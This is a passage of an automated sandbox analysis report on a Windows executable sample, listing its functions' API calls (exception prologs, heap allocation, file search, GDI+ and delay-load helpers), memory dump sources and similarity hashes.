                                                                                            • __EH_prolog.LIBCMT ref: 00A313E1
                                                                                              • Part of subcall function 00A35E37: __EH_prolog.LIBCMT ref: 00A35E3C
                                                                                              • Part of subcall function 00A3CE40: __EH_prolog.LIBCMT ref: 00A3CE45
                                                                                              • Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A313E1
                                                                                              • Part of subcall function 00A35E37: __EH_prolog.LIBCMT ref: 00A35E3C
                                                                                              • Part of subcall function 00A3CE40: __EH_prolog.LIBCMT ref: 00A3CE45
                                                                                              • Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A4B098
                                                                                              • Part of subcall function 00A313DC: __EH_prolog.LIBCMT ref: 00A313E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00A5ACF8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID:
                                                                                            • API String ID: 190572456-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            APIs
                                                                                              • Part of subcall function 00A5B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A59813,00000001,00000364,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A5B177
                                                                                            • _free.LIBCMT ref: 00A5C4E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 614378929-0
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A59813,00000001,00000364,?,00A53F73,00000050,?,00A71030,00000200), ref: 00A5B177
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00A53C3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID:
                                                                                            • API String ID: 190572456-0
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A5CA2C,00000000,?,00A56CBE,?,00000008,?,00A591E0,?,?,?), ref: 00A58E38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A35AC2
                                                                                              • Part of subcall function 00A3B505: __EH_prolog.LIBCMT ref: 00A3B50A
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            APIs
                                                                                              • Part of subcall function 00A3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6C4
                                                                                              • Part of subcall function 00A3A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6F2
                                                                                              • Part of subcall function 00A3A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A3A592,000000FF,?,?), ref: 00A3A6FE
                                                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A3A598
                                                                                            Similarity
                                                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1464966427-0
                                                                                            APIs
                                                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00A40E3D
                                                                                            Similarity
                                                                                            • API ID: ExecutionStateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2211380416-0
                                                                                            APIs
                                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 00A4A62C
                                                                                              • Part of subcall function 00A4A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A4A3DA
                                                                                            Similarity
                                                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                            • String ID:
                                                                                            • API String ID: 1915507550-0
                                                                                            APIs
                                                                                            • DloadProtectSection.DELAYIMP ref: 00A4E5E3
                                                                                            Similarity
                                                                                            • API ID: DloadProtectSection
                                                                                            • String ID:
                                                                                            • API String ID: 2203082970-0
                                                                                            APIs
                                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00A41B3E), ref: 00A4DD92
                                                                                              • Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
                                                                                              • Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
                                                                                              • Part of subcall function 00A4B568: IsDialogMessageW.USER32(00010426,?), ref: 00A4B59E
                                                                                              • Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
                                                                                              • Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6
                                                                                            Similarity
                                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                            • String ID:
                                                                                            • API String ID: 897784432-0
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(000000FF,00A397BE), ref: 00A398C8
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 444c793bda30df4e688c4aba844b4ddd1f1dc4cbb8e877287947e1af65c704d5
                                                                                            • Instruction ID: 6118ac58c85c2ad5efc391299da92ac70202e29fd4c8c157c44d73ff4a0975a7
                                                                                            • Opcode Fuzzy Hash: 444c793bda30df4e688c4aba844b4ddd1f1dc4cbb8e877287947e1af65c704d5
                                                                                            • Instruction Fuzzy Hash: 7CB012EE3D8100BC3D04A14A1D02C37013CE0C5B203308A3EFC02C0480D840BC000431
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 625526244fa5681afb53b754f175edc539288951d3fff8966c9591da41bd3013
                                                                                            • Instruction ID: 87751c89226a50a863886f3464d5e6d4b07e3916f918b3771ad77f97ac842406
                                                                                            • Opcode Fuzzy Hash: 625526244fa5681afb53b754f175edc539288951d3fff8966c9591da41bd3013
                                                                                            • Instruction Fuzzy Hash: E6B012FA3D8000BC3D44E1091E02C3701FCE0C4B20330863EF806C0080DD407D010531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 069168e9f5174e725abe2892f7253dce52737931dbdb96638219bce521af795c
                                                                                            • Instruction ID: cf598d37aa7b8b9b1f58228c9694aa346b2a9b09c7bdbffab2cec8fcd07580b7
                                                                                            • Opcode Fuzzy Hash: 069168e9f5174e725abe2892f7253dce52737931dbdb96638219bce521af795c
                                                                                            • Instruction Fuzzy Hash: 83B092AA298100BC2984A1091D06C36016CE0C4B20330462AB806C008098406D400531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 2fcb9eb1b399e440fd63f9141d11f940d2969bc865cf7e4281d3c82469ac49e2
                                                                                            • Instruction ID: 21fcf3e9e3aa95d6a8c0797281470f0d17ebdc0fe03027ad77fc6d20589fca1f
                                                                                            • Opcode Fuzzy Hash: 2fcb9eb1b399e440fd63f9141d11f940d2969bc865cf7e4281d3c82469ac49e2
                                                                                            • Instruction Fuzzy Hash: 0AB012FA3D8000BC3D44E10D1E06C37017CE0C4F20330463EF806C0080DC407E010531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 0fbe83bb5f45e735f30a2ee55b414d3f85924abf8ec501bd22c7f9a2dda653eb
                                                                                            • Instruction ID: 377a98c09689b80f0672d8af29d848ffb4f51c453f09e9cea3eb2241c4ba5602
                                                                                            • Opcode Fuzzy Hash: 0fbe83bb5f45e735f30a2ee55b414d3f85924abf8ec501bd22c7f9a2dda653eb
                                                                                            • Instruction Fuzzy Hash: 18B012FA3D8000BC3D44E10E1D06C37017CF0C4F20330463EF806C0090D8407D000531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: c7f22c5f7ed6880a518f4df50b0057019abaf208190d852c688212dcfae4ffeb
                                                                                            • Instruction ID: 690c3e63331f5ce8fb2fa3e196da726cf1def8302c7cf6118afa8bbaaa06d2ca
                                                                                            • Opcode Fuzzy Hash: c7f22c5f7ed6880a518f4df50b0057019abaf208190d852c688212dcfae4ffeb
                                                                                            • Instruction Fuzzy Hash: A1B012EE3D9140BC3D84E2091D02C37017CE0C4B20330873FF806C0180D8407C440531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 6a049d37f82f5998ecb661a9f4560438c393be1625b8a2d5c57e470f6fc399df
                                                                                            • Instruction ID: b689806b20b60a6dda6b79081011654163013f149545203da44b3f9609161a83
                                                                                            • Opcode Fuzzy Hash: 6a049d37f82f5998ecb661a9f4560438c393be1625b8a2d5c57e470f6fc399df
                                                                                            • Instruction Fuzzy Hash: 6EB012EE3DD000BC3D44E2091E02C37017CE0C4B20330863EF806C0180DC507D090531
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
